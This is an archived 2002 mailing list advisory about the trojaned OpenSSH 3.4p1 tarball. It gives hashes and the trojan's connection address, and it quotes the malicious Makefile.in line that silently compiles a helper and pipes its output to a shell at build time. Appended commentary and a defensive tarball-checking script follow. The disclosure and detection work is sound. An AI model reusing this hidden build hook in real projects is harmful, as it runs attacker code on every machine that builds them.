Firewall Wizards mailing list archives
OpenSSH 3.4p1 possibly trojaned
From: "Paul D. Robertson" <proberts () patriot net>
Date: Thu, 1 Aug 2002 07:31:00 -0400 (EDT)
[Mod Note: No, I'm not going to post every vuln that comes down the pike- but this one is potentially significant.]

http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

It would appear that the OpenSSH code for all the non-OpenBSD systems was trojaned at some point pretty recently. I just checked the MD5 (and sources) of the version I put on my public-facing systems, and it's the same as the FreeBSD ports one (clean):

  # md5sum openssh-3.4p1.tar.gz
  459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz

I got that copy around 19:43 Eastern on July 17th. If you pulled a copy after that, it's probably worth a check.

------------------------------------------------------------------------
Things to check:

MD5 of the trojaned tar.gz: 3ac9bc346d736b4a51d676faa2a08a57

Source addition: openssh-3.4p1/openbsd-compat/Makefile.in:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

Trojan connection: 203.62.158.32:6667 (web.snsonline.net)
----------------------------------------------------------------------

I just downloaded openssh from ftp://ftp.openbsd.org and the changes described in the advisory are present. I haven't yet verified the trojan code is as described, but it looks to be code masquerading as blowfish test code in the compat library which isn't in the original source distribution I downloaded on the 17th.

Given that this isn't p2- the change seems enough justification to feed this forward.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson          "My statements in this message are personal opinions
proberts () patriot net    which may have no basis whatsoever in fact."
probertson () trusecure com
Director of Risk Assessment
TruSecure Corporation

_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
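
Review bot: the added recipe line under "all:" in openbsd-compat/Makefile.in executes code at build time: it compiles bf-test.c, runs the result, redirects its output to bf-test.out, and then hands that file to sh in the background. The leading "@" stops make from echoing the command, so nothing about it shows up in the build log, and the trailing "&" lets the build continue normally. A default target has no reason to run a freshly compiled helper and feed its output to a shell; the line should be rejected, and because it runs as whichever account invoked make, that account on any host that built this tarball is what needs examining.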
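
The two checks listed in the message (tarball MD5 and the Makefile.in addition), combined into one script. This is an added example, not part of the original post: the function names are hypothetical, the hashes and the Makefile.in path are the ones quoted above, and it assumes md5sum and a tar that supports -O (extract to stdout) are installed.

```shell
#!/bin/sh
# Added example. Hashes and path are those quoted in the message above.
CLEAN_MD5="459c1d0262e939d6432f193c7a4ba8a8"
TROJAN_MD5="3ac9bc346d736b4a51d676faa2a08a57"
MAKEFILE_PATH="openssh-3.4p1/openbsd-compat/Makefile.in"

# Map an MD5 hex digest (either case) to: clean | trojaned | unknown.
classify_md5() {
    case "$(printf '%s' "$1" | tr 'A-F' 'a-f')" in
        "$CLEAN_MD5")  echo clean ;;
        "$TROJAN_MD5") echo trojaned ;;
        *)             echo unknown ;;
    esac
}

# Read Makefile.in text on stdin; succeed if it references bf-test,
# which the message says is absent from the original distribution.
has_bftest_recipe() {
    grep -q 'bf-test'
}

# Print "<verdict> <md5>" for a tarball. A hash match is checked first;
# a bf-test reference inside Makefile.in marks the tarball as trojaned
# even when the hash is one we have never seen (e.g. a repacked copy).
# Exit status: 0 only for the known-clean hash, 2 if unreadable, else 1.
check_tarball() {
    tarball=$1
    [ -r "$tarball" ] || { echo "unreadable -"; return 2; }
    sum=$(md5sum "$tarball" | awk '{print $1}')
    verdict=$(classify_md5 "$sum")
    # -O streams the single member to stdout without unpacking anything.
    if tar -xzOf "$tarball" "$MAKEFILE_PATH" 2>/dev/null | has_bftest_recipe; then
        verdict=trojaned
    fi
    echo "$verdict $sum"
    [ "$verdict" = clean ]
}

# Stand-alone use: sh check.sh openssh-3.4p1.tar.gz
if [ "$#" -gt 0 ]; then
    check_tarball "$1"
fi
```

An "unknown" verdict means neither hash matched and no bf-test reference was found; it is not a statement that the tarball is good.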